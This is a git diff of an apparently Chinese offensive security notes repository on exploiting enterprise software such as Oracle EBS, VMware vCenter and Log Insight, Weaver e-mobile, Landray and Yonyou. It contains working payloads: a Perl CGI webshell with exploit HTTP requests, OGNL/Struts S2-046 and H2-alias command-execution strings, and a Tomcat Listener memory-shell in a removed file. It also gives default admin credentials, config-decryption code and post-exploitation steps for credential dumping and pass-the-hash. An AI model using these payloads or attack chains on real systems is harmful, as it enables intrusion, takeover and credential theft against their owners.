b/application/ibm/README.md @@ -0,0 +1,5 @@ +历史漏洞 + +- [ ] CVE-2020-4280 反序列化 + + 
diff --git a/application/landray/README.md b/application/landray/README.md new file mode 100644 index 00000000..2951f72c --- /dev/null +++ b/application/landray/README.md @@ -0,0 +1,7 @@ +历史漏洞 + +- pre-auth SSRF/FileRead - custom.jsp +- post-auth SQLi - kmImeetingRes.do +- post-auth XMLDecoderDeserialization - sysSearchMain.do +- post-auth RCE = getBean() + bsh.Interpreter - dataxml.jsp +- post-auth JDBC RCE - admin.do \ No newline at end of file diff --git "a/application/landray/345円210円251円347円224円250円347円240円224円347円251円266円.md" "b/application/landray/345円210円251円347円224円250円347円240円224円347円251円266円.md" new file mode 100644 index 00000000..ade650c2 --- /dev/null +++ "b/application/landray/345円210円251円347円224円250円347円240円224円347円251円266円.md" @@ -0,0 +1,53 @@ +利用研究 +--- + +### 配置文件解密 - admin.properties + +文件位置 +> ekp/WEB-INF/KmssConfig/admin.properties + +解密工具 +- https://github.com/zhutougg/LandrayDES + + + +### 配置文件解密 - kmssconfig.properties +文件位置 + +> ekp/WEB-INF/KmssConfig/kmssconfig.properties + +example + +![image](https://user-images.githubusercontent.com/55024146/178807547-9882a2d1-7c1d-487e-af42-28a610a8fcaf.png) + + +解密代码实现 + +```java +package org.example; + +import java.io.*; +import java.nio.file.Files; +import java.nio.file.Paths; +import com.landray.kmss.sys.config.action.SysConfigAdminUtil; + +public class SysConfigDecrypt { + public static void main(String[] args) throws Exception { + InputStream in = Files.newInputStream(Paths.get("H:\\landray\\ekp\\WEB-INF\\KmssConfig\\kmssconfig.properties")); + InputStreamReader inr = new InputStreamReader(SysConfigAdminUtil.doPropertiesDecrypt(in)); + BufferedReader br = new BufferedReader(inr); + String line; + StringBuilder sb = new StringBuilder(); + while((line = br.readLine()) != null){ + sb.append(line).append("\r\n"); + } + System.out.println(sb); + } +} +``` + + +解密效果如图 + +![image](https://user-images.githubusercontent.com/55024146/178808195-4c7c822d-36bb-47ac-a54e-8a0ce7014581.png) + 
diff --git a/application/mcafee/README.md b/application/mcafee/README.md new file mode 100644 index 00000000..fab488c5 --- /dev/null +++ b/application/mcafee/README.md @@ -0,0 +1,4 @@ +历史漏洞 + +- [ ] ZipSlip -> RCE + diff --git a/application/oracle/access manager/README.md b/application/oracle/access manager/README.md new file mode 100644 index 00000000..e6eaa515 --- /dev/null +++ b/application/oracle/access manager/README.md @@ -0,0 +1,3 @@ +历史漏洞 + +- [] CVE-2021-35587 RCE diff --git a/application/oracle/e-business suite/README.md b/application/oracle/e-business suite/README.md new file mode 100644 index 00000000..c30bafb4 --- /dev/null +++ b/application/oracle/e-business suite/README.md 
@@ -0,0 +1,100 @@ +CVE-2022-21587 pre-auth ZipSlip -> RCE +--- + +#### 漏洞分析 +web.xml + +```xml + + BneUploaderService + oracle.apps.bne.integrator.upload.BneUploaderService + + + + BneUploaderService + /BneUploaderService + +``` + +BneUploaderService 的父类 BneAbstractXMLServlet 在处理文件上传包时会调用 BneUnZip#doUnZip 进行解压处理 + + +```java +public String doUnZip(String var1) throws IOException { + new String(""); + String var3 = new String(""); + BneContext.getLogInstance().log(7, "BneUnZip.doUpZip Enter fileName: " + var1); + String var2 = BneSitePropertyManager.getInstance().getProperty("BNE_UPLOAD_STAGING_DIRECTORY"); + + try { + BufferedOutputStream var4 = null; + FileInputStream var5 = new FileInputStream(var1); + ZipInputStream var6 = new ZipInputStream(new BufferedInputStream(var5)); + + ZipEntry var7; + while((var7 = var6.getNextEntry()) != null) { + byte[] var8 = new byte[2048]; + var3 = var2 + System.getProperty("file.separator") + var7.getName(); + // 漏洞点 entry.getName() 是可控的 -> zip slip + FileOutputStream var10 = new FileOutputStream(var3); +``` + +需要注意的点: 解压前调用 BneDecoder#doDecode 进行解码(Unix-to-Unix encoding),所以在生成 zip-slip 的文件后需要进行 uuencode 编码. 
+ +#### 漏洞复现 + +1、生成 uuencode 编码后的payload + +- txkFNDWRR.pl +```perl +use CGI; +print CGI::header( -type => 'text/plain' ); +my $cmd = CGI::http('HTTP_CMD'); +print system($cmd); +exit; +``` + +ps: jdk 自带 uuencode 编码的实现, 关键代码: + +```java +byte[] bytes = Files.readAllBytes(Paths.get(evilZipFile)); +String payload = new UUEncoder(zipName).encodeBuffer(bytes); +``` + +![image](https://user-images.githubusercontent.com/55024146/216362687-707f41df-533b-4bb4-8981-c056ffd81f99.png) + +2、第1个请求,通过 zipslip 覆盖 txkFNDWRR.pl + +```http +POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1 +Host: apps.example.com:8000 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv +Content-Length: 769 + +------WebKitFormBoundaryZsMro0UsAQYLDZGv +Content-Disposition: form-data; name="bne:uueupload" + +TRUE +------WebKitFormBoundaryZsMro0UsAQYLDZGv +Content-Disposition: form-data; name="uploadfilename";filename="test.zip" + +[payload] +------WebKitFormBoundaryZsMro0UsAQYLDZGv-- + +``` + +3、第2个请求,调用 CGI 执行命令并回显 + +```http +POST /OA_CGI/FNDWRR.exe HTTP/1.1 +Host: apps.example.com:8000 +cmd: pwd +Content-Type: application/x-www-form-urlencoded +Content-Length: 0 + +``` + +![image](https://user-images.githubusercontent.com/55024146/216365358-cdd610ee-108c-422b-b46c-e5c885facbc9.png) + + +详见: https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/ diff --git a/application/vmware/vcenter/README.md b/application/vmware/vcenter/README.md new file mode 100644 index 00000000..13360fd1 --- /dev/null +++ b/application/vmware/vcenter/README.md 
@@ -0,0 +1,11 @@ +历史漏洞 + +- [x] CVE-2022-31680 VMware vCenter PSC 反序列化 +- [ ] CVE-2021-44228 VMware Product RCE via Log4Shell +- [ ] CVE-2021-22017 VMware vCenter rhttpproxy Bypass +- [ ] CVE-2021-22005 VMware vCenter 文件上传 +- [ ] CVE-2021-21985 VMware vCenter 远程代码执行 +- [ ] CVE-2021-21973 VMware vCenter SSRF -> /sdk +- [ ] CVE-2021-21972 VMware vCenter 远程命令执行 +- [ ] CVE-2021-00000 VMware vCenter 文件读取 -> /eam/vib?id= +- [ ] CVE-2021-00000 VMware vCenter SSRF/文件读取 -> /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url= diff --git "a/application/vmware/vcenter/345円210円251円347円224円250円347円240円224円347円251円266円.md" "b/application/vmware/vcenter/345円210円251円347円224円250円347円240円224円347円251円266円.md" new file mode 100644 index 00000000..32f17000 --- /dev/null +++ "b/application/vmware/vcenter/345円210円251円347円224円250円347円240円224円347円251円266円.md" 
@@ -0,0 +1,71 @@ +基础信息 +--- + +#### 获取版本号 +version_detect.xml +```xml + + + + <_this type="ServiceInstance">ServiceInstance + + + +``` + +Curl One Liner +```shell +type version_detect.xml | curl -X POST -k -H 'Content-type:text/xml' -d @- https://10.10.100.100/sdk +``` + +![image](https://user-images.githubusercontent.com/55024146/153741369-ea745c9d-7851-4971-a2df-a3eb08605e6a.png) + +#### 数据库配置文件 +```shell +find -name vcdb.properties +cat /etc/vmware-vpx/vcdb.properties +# cat /etc/vmware/service-state/vpxd/vcdb.properties +``` +![image](https://user-images.githubusercontent.com/55024146/153741704-673cb757-be5e-4be5-93bd-cd2cef0fa93a.png) + + +#### 利用研究 + +攻击路径 +--- +- CVE-2021-44228(root) -> CVE-2020-3952 -> gain Administrative access +- CVE-2021-22005(root) -> CVE-2020-3952 -> gain Administrative access +- CVE-2021-21985(no root) -> CVE-2021-3156/CVE-2021-4034(root) -> CVE-2020-3952 -> gain Administrative access +- CVE-2021-21972(no root) -> CVE-2021-3156/CVE-2021-4034(root) -> CVE-2020-3952 -> gain Administrative access + +### CVE-2021-22005(root) -> CVE-2020-3952 -> gain Administrative access +> 实战案例 + +CVE-2021-22005获取初始webshell权限 + +CVE-2020-3952提取IdP证书、伪造管理员cookie获取后台权限 +- 工具地址 + - [vcenter_saml_login](https://github.com/horizon3ai/vcenter_saml_login) + +data.mdb位置: +- Linux: + + ``` + /storage/db/vmware-vmdir/data.mdb + ``` +- Windows + + ``` + C:\ProgramData\VMware\vCenterServer\data\vmdird\data.mdb + ``` + +![image](https://user-images.githubusercontent.com/55024146/144646720-bc6bb84a-def4-41e6-8ccc-8aedd89165b8.png) + +访问https://10.10.10.1/ui,在 /ui 路径下替换上一步所获得的cookie + +![image](https://user-images.githubusercontent.com/55024146/144649479-4b2c2947-5aa2-44bb-b0d5-c7e610799e78.png) + + +扩大战果 +- 可通过vcenter的快照功能获取虚拟机的快照,然后通过内存取证的姿势dump凭证,pth; +- 也可将快照传到本地,再恢复成虚拟机,然后通过PE,重命名CMD.EXE为OSK.exe覆盖原OSK.exe,此时开机打开屏幕键盘会弹出SYSTEM权限的命令行窗口,本地上线cs然后hashdump抓取凭证,pth即可。(by banliz1) 
diff --git a/application/vmware/vrealize log insight/README.md b/application/vmware/vrealize log insight/README.md new file mode 100644 index 00000000..8bab0d9f --- /dev/null +++ b/application/vmware/vrealize log insight/README.md 
@@ -0,0 +1,222 @@ +VMSA-2023-0001 pre-auth ZipSlip -> RCE +--- + +#### 漏洞分析 + + +漏洞的重点在于两处: +- 1 Thrift RPC 未授权的调用 +- 2 .pak 文件处理时的 zip slip 漏洞 + +**1 Thrift RPC 未授权的调用** + +DaemonCommands 实现的 Thrift RPC 命令 +```java +processMap.put("waitUntilStarted", new waitUntilStarted()); +processMap.put("waitUntilDaemonStarted", new waitUntilDaemonStarted()); +processMap.put("requestCommand", new requestCommand()); +processMap.put("runCommand", new runCommand()); +processMap.put("getCommandStatus", new getCommandStatus()); +processMap.put("cancelQueuedCommand", new cancelQueuedCommand()); +processMap.put("cancelRunningCommand", new cancelRunningCommand()); +processMap.put("getQueuedCommands", new getQueuedCommands()); +processMap.put("getRunningCommands", new getRunningCommands()); +processMap.put("getExitedCommands", new getExitedCommands()); +processMap.put("showInstrumentationStats", new showInstrumentationStats()); +processMap.put("resetInstrumentationStats", new resetInstrumentationStats()); +processMap.put("getHealthStatus", new getHealthStatus()); +processMap.put("getRecentHealthStatus", new getRecentHealthStatus()); +processMap.put("getArchiveStatus", new getArchiveStatus()); +processMap.put("getArchiveStatuses", new getArchiveStatuses()); +processMap.put("getLiveHealthMeter", new getLiveHealthMeter()); +processMap.put("serviceStartResult", new serviceStartResult()); +processMap.put("getVsphereHosts", new getVsphereHosts()); +processMap.put("configureVsphereHosts", new configureVsphereHosts()); +processMap.put("sampleEventType", new sampleEventType()); +processMap.put("expandEventType", new expandEventType()); +processMap.put("expandPattern", new expandPattern()); +processMap.put("getLocalStats", new getLocalStats()); +processMap.put("getClusterStats", new getClusterStats()); +processMap.put("getClusterHealthStatus", new getClusterHealthStatus()); +processMap.put("getClusterLiveHealthMeter", new getClusterLiveHealthMeter()); +processMap.put("getConfig", new 
getConfig()); +processMap.put("setConfig", new setConfig()); +processMap.put("waitUntilBootstrapped", new waitUntilBootstrapped()); +processMap.put("getNodeType", new getNodeType()); +processMap.put("setNodeType", new setNodeType()); +processMap.put("setTokenOnWorker", new setTokenOnWorker()); +processMap.put("isBootstrapped", new isBootstrapped()); +processMap.put("isRestartRequired", new isRestartRequired()); +processMap.put("setBootstrapped", new setBootstrapped()); +processMap.put("unbootstrap", new unbootstrap()); +processMap.put("join", new join()); +processMap.put("applyMembership", new applyMembership()); +processMap.put("approveMembership", new approveMembership()); +processMap.put("removeMembership", new removeMembership()); +processMap.put("setMaintenanceMode", new setMaintenanceMode()); +processMap.put("getMaintenanceNodes", new getMaintenanceNodes()); +processMap.put("getMembers", new getMembers()); +processMap.put("getMembershipPendingWorkers", new getMembershipPendingWorkers()); +processMap.put("getNodeStatus", new getNodeStatus()); +processMap.put("getNodeIPs", new getNodeIPs()); +processMap.put("sendAlertNotification", new sendAlertNotification()); +processMap.put("runRemoteUpgradeCommand", new runRemoteUpgradeCommand()); +processMap.put("updateClusterSslCertificate", new updateClusterSslCertificate()); +processMap.put("getClusterCertificate", new getClusterCertificate()); +processMap.put("restoreDefaultClusterSslCertificate", new restoreDefaultClusterSslCertificate()); +processMap.put("isCustomCertificateUsed", new isCustomCertificateUsed()); +processMap.put("addClusterCACertificate", new addClusterCACertificate()); +processMap.put("removeClusterCACertificate", new removeClusterCACertificate()); +processMap.put("repairCassandra", new repairCassandra()); +processMap.put("runPostUpgradeMigrations", new runPostUpgradeMigrations()); +``` + +当前 rce chain 只用到了 requestCommand 、getConfig + +1) 通过 getConfig 获取 token,为什么需要这个token? 
+- com.vmware.loginsight.daemon.commands.SystemCommands#remotePakDownloadCommand + +```java +public AbstractCommandExecutor remotePakDownloadCommand(final RemotePakDownloadCommand remotePakDownloadCommand, DistributedConfig distributedConfig) throws DistributedConfigException, MalformedURLException, RemoteUpgradeException { + if (!remotePakDownloadCommand.getSourceNodeToken().equals(distributedConfig.getMasterDaemon().getToken())) { + throw new RemoteUpgradeException("Remote PAK Download command must come from master."); + } else { +``` + +2) 通过 requestCommand 可执行的命令 + +- com.vmware.loginsight.daemon.DaemonCommandsHandler#requestCommand + +```java +switch (command.commandType) { + case SHUTDOWN_COMMAND: + ShutdownCommandExecutor sce = new ShutdownCommandExecutor(this.shutdownRunnable); + if (!command.shutdownCommand.immediately) { + return this.commandManager.addCommand(command, sce, !command.shutdownCommand.waitForQueued); + } + + sce.now(); + break; + case REPO_IMPORT_COMMAND: + return this.commandManager.addCommand(command, this.repoCommands.importCommand(command.repoImportCommand)); + case RESTART_COMMAND: + return this.commandManager.addCommand(command, this.systemCommands.restartCommand(command.restartCommand), !command.restartCommand.waitForQueued); + case PHONE_HOME_FEEDBACK_COMMAND: + return this.commandManager.addCommand(command, this.systemCommands.phoneHomeFeedbackCommand(command.phoneHomeFeedbackCommand)); + case HOST_SYNC_COMMAND: + return this.commandManager.addCommand(command, this.systemCommands.hostSyncCommand(command.hostSyncCommand)); + case NTP_SYNC_COMMAND: + return this.commandManager.addCommand(command, this.systemCommands.ntpSyncCommand(command.ntpSyncCommand)); + case SUPPORT_BUNDLE_COMMAND: + return this.commandManager.addCommand(command, this.systemCommands.supportBundleCommand(command.supportBundleCommand)); + case PAK_UPGRADE_COMMAND: + return this.commandManager.addCommand(command, 
this.systemCommands.pakUpgradeCommand(command.pakUpgradeCommand)); + case CONFIG_LOL_COMMAND: + return this.commandManager.addCommand(command, this.systemCommands.configLolCommand()); + case REMOTE_PAK_DOWNLOAD_COMMAND: + return this.commandManager.addCommand(command, this.systemCommands.remotePakDownloadCommand(command.remotePakDownloadCommand, (DistributedConfig)this.configurationHolder.getConfiguration(DistributedConfig.class))); + } +``` + +分别调用 remotePakDownloadCommand 和 pakUpgradeCommand 下载恶意的 pak 并进行处理 + +**2 .pak 文件处理时的 zip slip 漏洞** + +- com.vmware.loginsight.daemon.commands.SystemCommands#pakUpgradeCommand + +pakUpgradeCommand 的执行流程中会调用py脚本执行 pak 的处理 + +- opt/vmware/bin/loginsight-pak-upgrade + +```python +if __name__ == '__main__': + loginsight_home = '/usr/lib/loginsight' + cmd = [os.path.join(loginsight_home, 'application', 'sbin', 'loginsight-pak-upgrade.py')] + cmd.extend(sys.argv[1:]) + p = subprocess.Popen(cmd, preexec_fn=os.setsid) + p.wait() + sys.exit(p.returncode) +``` + +- /usr/lib/loginsight/application/sbin/loginsight-pak-upgrade.py + +关键代码 + +```python + +# application/sbin/loginsight-pak-upgrade.py:378 +import tarfile + +# Extract necessary files from the pak file +def extractFiles(inputFile, fileList): + try: + tar = tarfile.open(inputFile, "r") + except: + raise Exception("Cannot open " + inputFile) + try: + if len(fileList) == 0: + tar.extractall() + else: + for fname in fileList: + tar.extract(fname) + except: + raise Exception("Cannot extract file from pak file") + finally: + tar.close() + return +``` + +在从 pak 文件中提取文件,调用python 的 tarfile库进行解压 + +- https://www.securecodewarrior.com/article/traversal-bug-in-pythons-tarfile-module + +由于该库存在zipslip漏洞,从而导致任意文件写入 + +--- + +注意: 当调用 extractFiles(inputFile, fileList),且fileList不为空时,只会解压filelist中的文件,所以需要找到fileList为空的调用 + +```python + # perform upgrade +else: + fileList = [pak.mfFile, pak.certFile] + # extract .cert and .mf files + extractFiles(inputFile, fileList) + # verify certificate and 
signature + if pak.verifyCertificate(): + if pak.validateSignature(): + manifest = Manifest.parseManifest(pak.mfFile) + if options.force_install: + manifest.skip_version_check = True + version = str(manifest.verTo) + # check and perform upgrade + if manifest.checkSupportVersion(): + if manifest.checkDiskSpace(): + # extract all files + extractFiles(inputFile, []) +``` + +所以构造的pak文件需要满足3个条件: + +``` +if pak.verifyCertificate(): +if pak.validateSignature(): +if manifest.checkSupportVersion(): +``` + +#### 漏洞复现 + +horizon3ai 后面放出了基于 py 的利用工具 https://github.com/horizon3ai/vRealizeLogInsightRCE ,NB但复杂 + +ps: 用 java 写 50 行左右代码足以 + + +![image](https://user-images.githubusercontent.com/55024146/216533004-86098604-80c1-4b49-856c-36b8f0032bbd.png) + + + +ref +- https://www.horizon3.ai/vmware-vrealize-cve-2022-31706-iocs/ +- https://www.horizon3.ai/vmware-vrealize-log-insight-vmsa-2023-0001-technical-deep-dive/ + + diff --git a/application/vmware/workspace one access/README.md b/application/vmware/workspace one access/README.md new file mode 100644 index 00000000..9e9cea78 --- /dev/null +++ b/application/vmware/workspace one access/README.md @@ -0,0 +1,6 @@ +历史漏洞 + +- [ ] CVE-2022-22954 SSTI -> pre-auth RCE +- [ ] CVE-2021-22056 SSRF +- [ ] CVE-2020-4006 Comand Injection + diff --git "a/application/weaver/ecology/345円210円251円347円224円250円347円240円224円347円251円266円.md" "b/application/weaver/ecology/345円210円251円347円224円250円347円240円224円347円251円266円.md" new file mode 100644 index 00000000..856e25d2 --- /dev/null +++ "b/application/weaver/ecology/345円210円251円347円224円250円347円240円224円347円251円266円.md" @@ -0,0 +1,18 @@ +### 0x01 默认账号密码 +``` +sysadmin/1 +``` +对应数据库的 +- 表名:`HrmResourceManager` +- 字段:`password` + +### 0x02 XStream 反序列化漏洞 + +需要考虑的实战场景: +- XStream的不出网利用 + - CVE-2021-39149 TemplatesImpl + - CVE-2021-21350 BCEL +- 回显 & 内存马 + + + diff --git a/application/weaver/emobile/README.md b/application/weaver/emobile/README.md new file mode 100644 index 00000000..0d039edd --- /dev/null 
+++ b/application/weaver/emobile/README.md 
@@ -0,0 +1,100 @@ +前置基础 +--- + + +相关漏洞 +--- +### 后台 & 默认账号密码 + +- 后台地址 +``` +/manager/login.do +``` +- 默认账号密码 +e-mobile常搭配e-cology使用、系统管理员即为e-cology的默认管理员 +``` +sysadmin/1 +``` + +### CNVD-2017-03561 login.do OGNL 表达式注入漏洞 + +已测试版本 +``` +v6.5 +v5.5 +``` + +触发点 +- /login.do?message=${} +- /manager/login.do?message=${} + +回显 + +```java +message=(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()))).(#w.close())&cmd=whoami +``` + +测试效果 + +![image](https://user-images.githubusercontent.com/55024146/157926046-e10965ef-4eef-4a87-8105-cfcf7849437c.png) + + + +### CNVD-2017-07285 S2-046 (S2系列) + +已测试版本 +``` +v5 +``` + +S2系列漏洞 + +![image](https://user-images.githubusercontent.com/55024146/157924785-3104e738-e0ad-4695-874d-43b5bb675fa4.png) + +回显 +``` +filename="%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} +``` +测试效果(S2-046) + +![image](https://user-images.githubusercontent.com/55024146/157925660-8eb25fbb-8634-491f-bcf8-6181f5686686.png) + + + + + +### CNVD-2021-25287 SQLi to RCE (messageType.do & client.do) 
+ +已测试版本 +``` +v6.6 +``` + +内置H2数据库,可以利用alias别名,调用java代码达到命令执行的效果 + + +```java +CREATE ALIAS EXEC AS +$$ void e(String cmd) throws java.io.IOException +{java.lang.Runtime rt= java.lang.Runtime.getRuntime();rt.exec(cmd);}$$ +CALL EXEC('whoami'); +``` + +测试效果 +- messageType.do + + + + + +- client.do + + + + + + + + + + diff --git a/application/yonyou/code/ncDatabase.jar b/application/yonyou/code/ncDatabase.jar new file mode 100644 index 00000000..f41f980c Binary files /dev/null and b/application/yonyou/code/ncDatabase.jar differ diff --git "a/application/yonyou/345円210円251円347円224円250円347円240円224円347円251円266円.md" "b/application/yonyou/345円210円251円347円224円250円347円240円224円347円251円266円.md" new file mode 100644 index 00000000..4685aca5 --- /dev/null +++ "b/application/yonyou/345円210円251円347円224円250円347円240円224円347円251円266円.md" @@ -0,0 +1,36 @@ +利用研究 +--- + +### 数据库密码解密 + +数据库配置文件位置 + +> /ierp/bin/prop.xml + +example + +``` + +nc +C2 +jdbc:sqlserver://127.0.0.1:1433;database=nc;sendStringParametersAsUnicode=false +nc +jlehfdffcfmohiag +com.microsoft.sqlserver.jdbc.SQLServerDriver +SQLSERVER +50 +10 +nc.bs.mw.ejb.xares.IerpDataSource +nc.bs.mw.ejb.xares.IerpXADataSource +0 +0 +0 + +``` + +效果如图: + +![image](https://user-images.githubusercontent.com/55024146/178786818-366dc752-2f40-4b80-9dbf-98e206aa732c.png) + + + diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 28.png b/code-audit/01_ofcms/ofcms.assets/Untitled 28.png deleted file mode 100644 index 8b7e1ea2..00000000 Binary files a/code-audit/01_ofcms/ofcms.assets/Untitled 28.png and /dev/null differ diff --git a/code-audit/01_ofcms/ofcms.assets/Untitled 6.png b/code-audit/01_ofcms/ofcms.assets/Untitled 6.png deleted file mode 100644 index c1c1c5b5..00000000 Binary files a/code-audit/01_ofcms/ofcms.assets/Untitled 6.png and /dev/null differ diff --git a/component/batik/README.md b/component/batik/README.md new file mode 100644 index 00000000..7e1e376a --- /dev/null +++ b/component/batik/README.md 
@@ -0,0 +1,7 @@ +- https://xmlgraphics.apache.org/batik/ + +> actually can lead to rce + + +image + diff --git a/component/commons-jxpath/README.md b/component/commons-jxpath/README.md new file mode 100644 index 00000000..af20d4a8 --- /dev/null +++ b/component/commons-jxpath/README.md @@ -0,0 +1,13 @@ +> CVE-2022-41852 +- [Extension_Functions](https://commons.apache.org/proper/ç/users-guide.html#Extension_Functions) + +``` +Using the standard extension functions, you can call methods on objects, static methods on classes +and create objects using any constructors. All class names should be fully qualified. +``` + +image + + + + diff --git a/component/hutool/README.md b/component/hutool/README.md new file mode 100644 index 00000000..e3c43ff7 --- /dev/null +++ b/component/hutool/README.md @@ -0,0 +1,6 @@ +相关漏洞 +--- + +### CVE-2018-17297 ZipSlip + +- [Hutool任意文件覆盖漏洞分析](https://www.sqyysec.com/Hutool%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%A6%86%E7%9B%96%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/) diff --git a/component/urlrewritefilter/README.md b/component/urlrewritefilter/README.md new file mode 100644 index 00000000..d1a839c1 --- /dev/null +++ b/component/urlrewritefilter/README.md 
@@ -0,0 +1,42 @@ + + +#### [Arbitrary resource file download in urlrewrite.xml](https://jira.atlassian.com/browse/CONFSERVER-26888) + +**Description** + +There is an arbitrary resource file download vulnerability triggered by a third party library org.tuckey.web.filters.urlrewrite.UrlRewriteFilter. + +The urlrewrite.xml rules file shows the pattern that will trigger a forward rule, which is the equivelant of performing dp = request.getServletContext().getRequestDispatcher(resource); dp.forward(request, response);. This construct allows a user to forward requests to any resource file on the server, such as /WEB-INF/web.xml - which could potentially contain sensitive information like usernames and passwords. + +web.xml +```xml + + + UrlRewriteFilter + org.tuckey.web.filters.urlrewrite.UrlRewriteFilter + +``` +urlrewrite.xml +```xml +... + + ^/s/(.*)/_/([^\?]*).* + + /2ドル + + +``` + +The attached screenshot shows this issue being exploited. + +![image](https://user-images.githubusercontent.com/55024146/186207280-b6436a75-5da9-4c69-887d-772887afbcb3.png) + +#### CVE-2021-26085 & CVE-2021-26086 + +- https://hackerone.com/reports/1369288 +- https://xz.aliyun.com/t/10109 +- https://tttang.com/archive/1323/ + +#### CVE-2022–31656 + +- https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd diff --git a/development/javassist/README.md b/development/javassist/README.md new file mode 100644 index 00000000..2408b6d9 --- /dev/null +++ b/development/javassist/README.md @@ -0,0 +1,17 @@ + +https://www.javassist.org/tutorial/tutorial.html + +解决需求: + +根据已有模板动态创建 class,可以修改部分需要自定义的字段值 + +应用场景: + +由内存马模板文件动态生成自定义密码/密钥/请求头等的 class + +--- + +问题记录 + +01 javassist.NotFoundException +- https://blog.csdn.net/paincupid/article/details/51175244 diff --git a/fileless-shell/resin/README.md b/fileless-shell/resin/README.md deleted file mode 100644 index 8d9622a0..00000000 --- a/fileless-shell/resin/README.md +++ /dev/null 
@@ -1,33 +0,0 @@ -**目录** -- 动态注册Servlet内存马 -- 动态注册Filter内存马 - -> 已测试 3.1.16、4.0.65 - -### 动态注册Servlet内存马 - -#### Resin 3.x -测试效果 - -![image](https://user-images.githubusercontent.com/55024146/144110176-47b8e700-3325-4e06-aeaa-34147ee78388.png) - - -#### Resin 4.x -测试效果 - -![image](https://user-images.githubusercontent.com/55024146/144110009-e42cc268-2e4d-423e-8cc5-73925e674bf1.png) - - -### 动态注册Filter内存马 - -#### Resin 3.x -测试效果 - -![image](https://user-images.githubusercontent.com/55024146/144110320-d0c6b574-c5d8-419c-b68e-08342236a7b1.png) - - -#### Resin 4.x - -测试效果 - -![image](https://user-images.githubusercontent.com/55024146/144109894-748339fa-78de-4e9e-a0a0-6d41a4f6880b.png) diff --git a/fileless-shell/tomcat/README.md b/fileless-shell/tomcat/README.md deleted file mode 100644 index 1172f49b..00000000 --- a/fileless-shell/tomcat/README.md +++ /dev/null 
@@ -1,394 +0,0 @@ -目录 - -- Listener 内存马 -- Valve 内存马 - - -> 已测试 tomcat8 - -### Listener 内存马 - -#### 静态添加Listener -- web.xml -- 注解 @WebListener - -##### web.xml -> ```xml -> -> -> -> com.example.tomcat8.listener.ListenerDemo -> -> -> ``` - -![image](https://user-images.githubusercontent.com/55024146/144615972-ff9454cc-6841-424b-9975-3e8f72ab5ca4.png) - -##### 注解 @WebListener - -@WebListener - -> ```java -> @WebListener -> public class ListenerDemo implements ServletRequestListener { -> @Override -> public void requestInitialized(ServletRequestEvent sre) { -> HttpServletRequest req = (HttpServletRequest) sre.getServletRequest(); -> try { -> SimpleDateFormat sdf = new SimpleDateFormat(); -> sdf.applyPattern("yyyy-MM-dd HH:mm:ss"); -> Date date = new Date(); -> System.out.println("Listener触发时间:" + sdf.format(date)); -> if (sre.getServletRequest().getParameter("cmd") != null){ -> Process process = Runtime.getRuntime().exec(sre.getServletRequest().getParameter("cmd")); -> java.io.BufferedReader bufferedReader = new java.io.BufferedReader(new java.io.InputStreamReader(process.getInputStream())); -> Field requestF = req.getClass().getDeclaredField("request"); -> requestF.setAccessible(true); -> Request request = (Request)requestF.get(req); -> StringBuilder stringBuilder = new StringBuilder(); -> String line; -> while ((line = bufferedReader.readLine()) != null) { -> stringBuilder.append(line + '\n'); -> } -> request.getResponse().getOutputStream().write(stringBuilder.toString().getBytes()); -> request.getResponse().getOutputStream().flush(); -> request.getResponse().getOutputStream().close(); -> } -> } catch (IOException | NoSuchFieldException | IllegalAccessException e) { -> e.printStackTrace(); -> } -> } -> @Override -> public void requestDestroyed(ServletRequestEvent sre) { -> } -> } -> ``` - -![image](https://user-images.githubusercontent.com/55024146/144616074-21954a43-ea72-4334-b128-22c7f3855d0a.png) - - -#### 动态添加Listener 
-关于动态添加Listener,需要了解一下`ServletContext`接口addListener()方法。 - -![image](https://user-images.githubusercontent.com/55024146/144616198-eb6a60f9-d9e9-44a9-84c2-0616656427f1.png) - -> \# 查看该接口得实现类 -> -> ctrl + alt + B - - -![image](https://user-images.githubusercontent.com/55024146/144616249-1def0739-ccce-429c-ba70-905acb0a8409.png) - -跟进ApplicationContext#addListener方法 - -![image](https://user-images.githubusercontent.com/55024146/144616350-1f0de065-abf2-429d-9af6-697497b5f567.png) - -可以发现,Listener添加的具体逻辑在方法`this.context.addApplicationEventListener(t)`。 - -继续跟进 - -![image](https://user-images.githubusercontent.com/55024146/144616378-c1b1f452-f7c7-414d-8a86-6fb24bbf9072.png) - -可以发现,将传入的Listener对象添加到applicationEventListenersList,至此,Listener添加流程结束。 - -所以接下来将添加流程用代码实现即可: - -- 自定义恶意的Listener -- 获取context (StandardContext) -- 反射调用addApplicationEventListener()动态添加Listener,实现Listener型内存马 - -step1-自定义listener - -``` -略 -``` - -step2-获取context - -> ```java -> // 从servletContext中获取context属性 -> applicationContext -> // 从applicationContext中获取context属性 -> standardContext*/ -> ServletContext servletContext = request.getServletContext(); -> Field appctx = servletContext.getClass().getDeclaredField("context"); -> appctx.setAccessible(true); -> ApplicationContext applicationContext = (ApplicationContext) 